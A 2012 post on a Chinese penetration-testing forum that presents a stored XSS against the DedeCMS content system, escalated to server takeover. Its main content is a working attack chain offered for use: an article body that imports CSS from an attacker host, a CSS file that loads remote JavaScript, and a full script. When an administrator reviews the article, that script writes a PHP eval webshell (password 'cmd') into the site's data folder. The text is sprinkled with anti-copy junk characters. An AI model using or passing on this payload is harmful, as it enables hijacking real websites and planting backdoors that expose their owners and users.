找回密码
 立即注册
中国网络渗透测试联盟»论坛 --==渗透测试区{ Penetration testing area }==-- web app渗透测试::『Web App penetration testing』 dedecms xss oday通杀所有版本 可getshell
欢迎中测联盟老会员回家,1997年注册的域名
返回列表 发新帖
查看: 2188|回复: 0
打印 上一主题 下一主题

dedecms xss oday通杀所有版本 可getshell

[复制链接]
admin
跳转到指定楼层
楼主
发表于 2012-9-15 13:56:10 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
<DIV id=read_tpc mb10?>漏洞原因:由于编辑器过滤不严,将导致恶意脚本运行。可getshell
0 ]+ m4 U/ y0 [1 M5 p& M: h( l为什么说它是ODay呢,能getshell的都算OD把`(鸡肋发挥起来也能变凤凰). x! m/ o. H, E9 P# p0 C
目前只是测试过5.3到5.7版本。其他更早的版本大家就自由发挥吧。) a/ {4 I$ m2 e9 _9 q7 f( S  n
下面说说利用方法。1 m7 T  ^, O* J# ?4 h) V* g
条件有2个:
) `5 _+ H8 u0 }# k& ?1 e- D& |; R1.开启注册: p; ^+ {( P9 s8 ?" L
2.开启投稿
! Q4 V* `  U# \4 U4 n2 g注册会员----发表文章( a8 B; Y! s+ E6 y4 u. L
内容填写:
  u! s2 }# a) L  ]6 j: w1 V3 ]复制代码/ F# T! l/ d  j% J/ O: F
<style>@im\port'\http://xxx.com/xss.css';</style>3 B1 l. i7 O  h' A4 k1 v+ B
新建XSS.Css
3 I* y' T/ u8 }3 V( x9 c; d+ }复制代码8 H5 }2 M8 @5 {" |7 Q) A8 D
.body{/ q2 ^  _( _" L7 [( ^
background-image:url('javascript:document.write("<script src=http://xxx.com/xss.js></script>")') }
& e+ B+ C. y+ @) Q9 ^新建xss.js 内容为
1 M1 g# u( A) B1 D& A7 y复制代码+ U6 ~( e8 N: H* q
1.var request = false;
# J4 M8 q  F, L) r" S2 `$ x2.if(window.XMLHttpRequest) {6 o, k* S4 X* e$ n
3.request = new XMLHttpRequest();. }( T2 X8 k0 v8 Y, J/ b5 h& f/ f# D7 O
4.if(request.overrideMimeType) {; r- C  a+ Y" a6 _) C  T
5.request.overrideMimeType('text/xml');
. ]! o% B6 l+ w9 M0 b6.}
0 z% v' C0 U* t/ E. \  L7.} else if(window.ActiveXObject) {
, t% u! A* W* a% I: q, I) c8.var versions = ['Microsoft.XMLHTTP', 'MSXML.XMLHTTP', 'Microsoft.XMLHTTP', 'Msxml2.XMLHTTP.7.0','Msxml2.XMLHTTP.6.0','Msxml2.XMLHTTP.5.0', 'Msxml2.XMLHTTP.4.0', 'MSXML2.XMLHTTP.3.0', 'MSXML2.XMLHTTP'];
4 y% k2 B; e) w# q& ]  O- |9.for(var i=0; i<versions.length; i++) {
1 V" |) C* T; @4 X' ?: @10.try {9 o/ K2 K- H% w+ Y7 b6 m* ]
11.request = new ActiveXObject(versions);  R$ H& l) T! J+ v0 u
12.} catch(e) {}
$ q- \  S6 Z! w. S- b13.}
2 L1 c. W6 Q. i# q- k8 K1 g14.}
5 l7 [6 o0 V0 {5 C  G1 |15.xmlhttp=request;
$ a) Z7 |0 m( N: {( ]4 `16.function getFolder( url ){
+ i/ v9 `, O# @6 S& v# w17. obj = url.split('/')3 V5 F5 s: W& C. S' G
18. return obj[obj.length-2]: K* a& O8 [  M6 @
19.}
$ K( \! W1 L, h# [, _% o20.oUrl = top.location.href;
& J* a6 T5 E, W5 n2 G$ _21.u = getFolder(oUrl);
5 |; M4 h- E5 ^( v% c22.add_admin();/ [* |1 b6 P4 ~+ v$ s
23.function add_admin(){8 }4 k0 l1 Y/ n4 X
24.var url= "/"+u+"/sys_sql_query.php";6 _( L  D9 A" d% h
25.var params ="fmdo=edit&backurl=&activepath=%2Fdata&filename=haris.php&str=<%3Fphp+eval%28%24_POST%5Bcmd%5D%29%3F>&B1=++%E4%BF%9D+%E5%AD%98++";- K: O" l. M! b- }! I" r! n3 P
26.xmlhttp.open("POST", url, true);6 U2 B- p# d& i* S
27.xmlhttp.setRequestHeader("Content-type", "application/x-www-form-urlencoded");( R: R6 Z/ f( M# h
28.xmlhttp.setRequestHeader("Content-length", params.length);
" g( b9 K6 T3 {- v+ R6 Q29.xmlhttp.setRequestHeader("Connection", "Keep-Alive");
3 b$ U$ @4 `" `0 j/ Q- a; Z30.xmlhttp.send(params);
' \; j- y# {3 W% ]% p31.}
- _: [4 |7 O* G9 O$ }/ I当管理员审核这篇文章的时候,将自动在data目录生成一句话haris.php。密码cmd
回复

使用道具 举报

返回列表 发新帖
高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

Copyright © 2001-2013 Comsenz. All Rights Reserved - Powered by Discuz! X3.2
快速回复 返回顶部 返回列表